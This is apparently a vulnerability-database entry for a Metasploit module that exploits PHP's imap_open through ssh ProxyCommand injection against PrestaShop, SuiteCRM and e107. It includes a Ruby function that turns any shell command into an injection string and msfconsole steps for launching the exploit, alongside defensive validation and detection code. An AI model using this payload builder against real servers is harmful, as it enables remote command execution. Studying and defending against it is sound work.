Vulnerability & Exploit Database


php imap_open Remote Code Execution

The imap_open function in PHP, if called without the /norsh flag in the mailbox string, will attempt to pre-authenticate an IMAP session over rsh. On Debian-based systems, including Ubuntu, rsh is mapped to the ssh binary. ssh's ProxyCommand option can be passed through imap_open's server argument to execute arbitrary commands. While many custom applications may use imap_open, this exploit works against the following applications: e107 v2, PrestaShop and SuiteCRM, as well as a Custom target, which simply prints the exploit strings for use elsewhere. PrestaShop exploitation requires the admin URI and administrator credentials; SuiteCRM, e107 and HostCMS require administrator credentials.
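The following Ruby is an added illustration of the mechanism described above; it is not code from the Metasploit module or from the page, and the exact encoding the module uses may differ. It assumes the widely published shape of the injected server string (a dummy host, then an ssh -oProxyCommand option whose command is base64-wrapped and uses ${IFS} instead of literal spaces, since c-client hands the server name to the rsh binary as argv and a space would end the option value). The safe_mailbox and injected_mailbox? helpers are hypothetical names showing the two checks a practitioner wants: build the mailbox spec only from validated parts with /norsh forced on, and flag request parameters that carry an ssh option or whitespace in the server field.

```ruby
require 'base64'

# Attacker side: turn an arbitrary shell command into an imap_open server
# string that makes c-client exec ssh with a ProxyCommand. Assumed format,
# modelled on public proof-of-concepts rather than taken from the module.
def proxycommand_mailbox(cmd)
  encoded = Base64.strict_encode64(cmd) # base64 removes spaces/quotes from cmd
  # "x" is a dummy host; everything after the first space becomes a separate
  # argv entry for ssh. ${IFS} is expanded only later, by the shell that ssh
  # uses to run ProxyCommand, so the option value itself contains no space.
  "{x -oProxyCommand=echo${IFS}#{encoded}|base64${IFS}-d|sh}"
end

# Defender side 1: build the mailbox spec from validated components so a
# user-supplied value can never reach ssh, and force /norsh so c-client does
# not attempt the rsh/ssh pre-authentication at all.
HOST_RE = /\A[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?\z/

def safe_mailbox(host, port: 993, ssl: true, folder: 'INBOX')
  raise ArgumentError, "bad host #{host.inspect}" unless host.match?(HOST_RE)
  raise ArgumentError, "bad port #{port.inspect}" unless (1..65535).cover?(port)
  flags = ssl ? '/imap/ssl/norsh' : '/imap/norsh'
  "{#{host}:#{port}#{flags}}#{folder}"
end

# Defender side 2: detection for logs or a WAF rule. A legitimate server part
# between the braces has no whitespace, no ssh -o<option>= and no ${IFS}.
def injected_mailbox?(spec)
  server = spec[/\A\{([^}]*)\}/, 1]
  return false if server.nil?
  !!(server =~ /\s|-o\w*=|\$\{?IFS/)
end

if __FILE__ == $PROGRAM_NAME
  evil = proxycommand_mailbox('id > /tmp/out')
  puts "injected spec:  #{evil}"
  puts "flagged?        #{injected_mailbox?(evil)}"
  puts "safe spec:      #{safe_mailbox('imap.example.com')}"
  begin
    safe_mailbox('x -oProxyCommand=id')
  rescue ArgumentError => e
    puts "rejected:       #{e.message}"
  end
end
```

The decisive fix is the /norsh flag (or not exposing the server field at all); the regex check is a second layer and a cheap signature for hunting this in web logs, where the request parameter will show the braces, -oProxyCommand and either tabs or ${IFS}.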


Module Name

exploit/linux/http/php_imap_open_rce

Authors

  • Anton Lopanitsyn
  • Twoster
  • h00die

Targets

  • prestashop
  • suitecrm
  • e107v2
  • custom

Platforms

  • unix

Architectures

  • cmd

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/linux/http/php_imap_open_rce
msf exploit(php_imap_open_rce) > show targets
    ...targets...
msf exploit(php_imap_open_rce) > set TARGET <target-id>
msf exploit(php_imap_open_rce) > show options
    ...show and set options...
msf exploit(php_imap_open_rce) > exploit